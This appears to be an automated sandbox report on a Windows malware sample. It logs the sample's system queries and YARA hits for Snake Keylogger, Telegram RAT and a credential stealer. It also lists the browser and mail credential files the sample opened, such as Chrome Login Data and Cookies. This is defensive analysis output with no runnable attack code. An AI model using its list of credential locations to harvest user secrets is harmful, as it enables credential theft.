Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
